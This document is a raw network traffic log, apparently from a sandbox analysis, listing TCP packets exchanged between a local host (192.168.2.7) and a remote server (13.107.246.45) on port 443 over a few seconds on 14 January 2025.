Jan 14, 2025 16:37:56.675152063 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.675463915 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.677808046 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.700675011 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.700787067 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.700850964 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.703109980 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.703422070 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.708524942 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.763849974 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.766491890 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.768544912 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.768707037 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.771148920 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.776849985 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.801687002 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.803134918 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.803172112 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.803208113 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.804969072 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.805454016 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.805833101 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.810343981 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.851970911 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.865453959 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.870985985 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.876012087 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.891477108 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.894553900 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.904488087 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.904505014 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.904561996 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.907790899 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.908003092 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.914165020 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.964891911 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.968092918 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:56.987921000 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:56.990817070 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.001195908 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.003444910 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.007026911 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.007062912 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.007101059 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.007127047 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.010539055 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.011431932 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.015394926 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.064013004 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.084350109 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.086638927 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.091590881 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.095379114 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.097078085 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.104136944 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.105819941 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.110636950 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.110719919 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.110797882 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.110856056 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.114339113 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.115294933 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.119426966 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.168277025 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.190524101 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.195806980 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.198937893 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.200719118 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.200882912 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.205770969 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.207784891 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.209677935 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.212577105 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.212613106 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.212637901 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.212656021 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.214639902 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.214710951 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.219559908 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.260086060 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.294331074 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.298470020 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.301001072 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.303406000 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.304217100 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.308110952 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.308239937 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.311021090 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.313839912 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.313880920 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.313920975 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.313937902 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.316618919 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.316685915 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.321883917 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.364154100 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.397571087 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.400219917 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.402179956 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.404407978 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.405047894 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.409251928 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.410424948 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.412587881 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.415260077 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.415275097 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.415326118 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.415347099 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.417376995 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.419699907 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.422214985 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.468230963 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.497895956 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.501140118 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.503714085 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.505964041 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.506721973 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.511001110 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.511070013 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.513701916 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.518455982 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.518476963 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.518542051 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.521337986 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.521406889 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.526143074 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.572058916 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.600414038 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.603456020 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.607405901 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.607495070 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.608361959 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.609750986 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.614619017 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.614675999 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.616940975 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.624562979 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.624598980 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.625395060 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.627636909 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.628467083 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.633905888 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.703145981 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.706151962 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.717541933 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.717580080 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.718291998 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.720937014 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.721396923 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.726349115 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.752861023 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.752885103 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.752943993 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.755748034 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.755886078 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.760668039 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.805898905 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.808348894 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.824316978 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.824356079 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.824666023 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.826853991 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.826853991 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.831784964 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.865725994 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.865762949 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.865869045 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.868828058 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.869272947 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.874206066 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.912679911 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.915440083 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.924287081 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.924321890 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.924400091 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.926430941 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.926636934 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.931463957 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.967751980 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.967772007 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:57.967920065 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.975013971 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.975569963 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:57.981292009 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.012851000 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.019670010 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.025548935 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.025589943 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.025660038 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.028486013 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.029665947 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.034677029 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.077204943 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.077219963 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.077461958 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.080691099 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.080882072 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.085649014 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.121906996 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.126913071 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.127204895 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.127221107 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.127260923 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.127343893 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.129508018 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.129755020 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.134341955 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.180054903 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.185978889 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.185996056 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.186136961 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.214817047 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.215888977 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.219794989 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.220784903 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.223139048 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.227346897 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.228410959 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.228429079 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.228494883 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.228494883 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.233352900 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.233354092 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.238512993 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.314941883 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.314964056 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.315335989 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.318001986 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.319276094 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.324316025 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.327240944 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.329399109 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.331041098 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.331056118 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.331068039 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.331084967 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.331330061 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.333617926 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.333617926 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.338442087 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.383954048 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.417165041 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.417181015 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.419275999 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.420022964 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.420022964 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.425026894 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.425039053 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.427120924 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.431334972 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.433324099 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.433376074 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.433461905 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.433518887 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.435710907 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.437184095 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.441327095 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.484276056 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.519690037 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.519702911 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.519814014 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.522934914 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.523148060 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.528080940 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.528090954 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.529731989 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.531802893 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.535473108 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.535485029 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.535542965 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.537662029 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.537816048 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.543952942 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.588131905 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.622028112 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.622047901 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.622098923 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.624774933 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.625370026 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.630829096 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.630980015 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.639097929 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.639132977 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.639213085 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.710346937 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.727643013 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.727679968 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.727747917 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.911803961 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.911879063 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.914000988 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.914594889 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.915060997 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:58.916696072 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.919488907 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:58.959996939 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.021085024 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.024414062 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.024450064 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.024504900 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.031866074 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.033427954 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.036670923 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.038331032 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.042299986 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.047122955 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.112685919 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.123285055 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.124351025 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.128149033 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.129184961 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.131232023 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.131268978 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.131325960 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.136677980 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.139328003 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.144270897 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.216892004 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.220141888 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.223258018 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.223320007 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.223362923 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.223429918 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.228784084 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.229664087 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.233753920 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.235553026 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.235590935 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.235644102 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.238353968 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.239089966 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.243974924 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.322375059 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.328452110 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.328495979 CET	443	49699	13.107.246.45	192.168.2.7
Jan 14, 2025 16:37:59.328511000 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.334001064 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.334913969 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.336416960 CET	49699	443	192.168.2.7	13.107.246.45
Jan 14, 2025 16:37:59.336631060 CET	443	49699	13.107.246.45	192.168.2.7
